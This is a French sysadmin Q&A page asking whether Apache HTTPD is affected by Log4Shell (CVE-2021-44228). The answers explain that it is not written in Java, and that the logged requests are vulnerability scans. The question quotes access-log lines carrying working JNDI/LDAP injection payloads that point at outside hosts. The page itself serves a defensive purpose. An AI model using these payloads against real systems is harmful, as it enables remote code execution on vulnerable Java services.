44 votes

gilex avatar

Est-ce que le serveur Web Apache utilise log4j (CVE-2021-44228) ?

Demandé el 12 de Décembre, 2021
Quand la question a-t-elle été
36020 affichage
Nombre de visites la question a
2 Réponses
Nombre de réponses aux questions
Résolu
Situation réelle de la question

Est-ce que le serveur web Apache (apache2) utilise log4j?

J'ai Apache2 2.4.38 (debian) installé sur Raspberry Pi OS (64bit) et j'ai trouvé des enregistrements étranges dans mes journaux concernant CVE-2021-44228 provenant de kryptoslogic-cve-2021-44228.com (honeypot/scanner), dataastatistics.com (hors ligne et malveillant ?) et a8fvkc.dnslog.cn (je ne sais pas ce que c'est)

Que dois-je faire maintenant?

  • ne rien faire car apache2 n'est pas affecté par CVE-2021-44228
  • formater tout et attendre quelques jours avant d'installer une version corrigée
  • "vérifier" s'il y a de nouveaux fichiers .class et s'il n'y en a pas, poursuivre l'opération (et utiliser des correctifs manuels tels que log4j2.formatMsgNoLookups = TRUE)
  • autre chose

Journaux :

139.59.99.80 - - [12/Déc/2021:00:34:47 +0100] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Déc/2021:00:34:48 +0100] "GET / HTTP/1.1" 200 5932 "http://79.232.126.49/" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Déc/2021:01:51:38 +0100] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 301 654 "-" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Déc/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Déc/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [11/Déc/2021:18:35:25 +0100] "GET / HTTP/1.1" 200 5932 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}"
139.59.99.80 - - [11/Déc/2021:20:13:11 +0100] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 404 8456 "-" "Kryptos Logic Telltale"
191.101.132.152 - - [11/Déc/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Déc/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Déc/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Déc/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Déc/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
137.184.106.119 - - [10/Déc/2021:20:38:18 +0100] "GET / HTTP/1.1" 301 568 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Déc/2021:20:38:20 +0100] "GET / HTTP/1.1" 200 6576 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Déc/2021:20:38:21 +0100] "GET /favicon.ico HTTP/1.1" 200 7103 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
Demandé el 12 de Décembre, 2021 par gilex

Réponses

Trop de publicités?

82voto

mschuett avatar
mschuett Points 3031

Le serveur HTTP Apache n'est pas écrit en Java, il n'utilise pas la bibliothèque log4j, il n'est donc pas affecté par CVE-2021-44228.

Vos fichiers de journalisation proviennent du fichier de journalisation d'accès, ils montrent des personnes en train de rechercher la vulnérabilité log4j.

Répondu el 12 de Décembre, 2021 par mschuett (3031 Points )

8voto

fraxinus avatar
fraxinus Points 524

Apache lui-même n'est pas écrit en Java et ne lie pas directement la tristement célèbre bibliothèque Log4j. Il est particulièrement sûr de cette vulnérabilité.

Alors, que peut-il arriver d'autre?

  1. Non tout ce qui porte le nom Apache et les fonctions HTTP n'est exactement le serveur Apache HTTPD. Apache Tomcat, par exemple, est un serveur web HTTP complètement différent. Il est écrit en Java et peut être configuré pour utiliser Log4J. Je ne suis pas vraiment sûr qu'il soit possible de journaliser autrement dans Tomcat.

Quelqu'un avec moins d'expérience et de connaissances est parfaitement capable de confondre les deux. Et, à ma connaissance, Tomcat a en général un meilleur bilan en matière de sécurité que l'Apache HTTPD "classique".

(Selon le commentaire de Bob, la facilité de journalisation par défaut dans Tomcat n'est pas Log4J.)

  1. Apache HTTPD est très extensible. Il peut être configuré pour appeler d'autres éléments en arrière-plan par diverses interfaces (par exemple, pour récupérer des pages web dynamiques générées de manière programmatique). Certains de ces "éléments en arrière-plan" peuvent être basés sur Java et liés à la bibliothèque Log4J.

Vos résultats peuvent varier, surtout si vous ne connaissez pas en détail votre pile logicielle.

Pour être sûr, vous devriez d'abord vérifier si vous avez une machine Java installée. Dans votre gestionnaire de paquets, ses paquets s'appelleront JRE-quelque chose, JVM-quelque chose ou peut-être JAVA-quelque chose.

Vous pouvez aussi essayer:

java -version

dans votre shell.

Si vous n'avez aucun de ces éléments et que vous n'avez pas installé JAVA en dehors de votre gestionnaire de paquets, vous êtes en sécurité.

Pas en sécurité en général, mais au moins protégé contre le CVE-2021-44228.

Répondu el 14 de Décembre, 2021 par fraxinus (524 Points )

Questions en vedette

Top Tags

Dans notre réseau

SistemesEz.com

SystemesEZ est une communauté de sysadmins où vous pouvez résoudre vos problèmes et vos doutes. Vous pouvez consulter les questions des autres sysadmins, poser vos propres questions ou résoudre celles des autres.

Powered by:

Yandex
X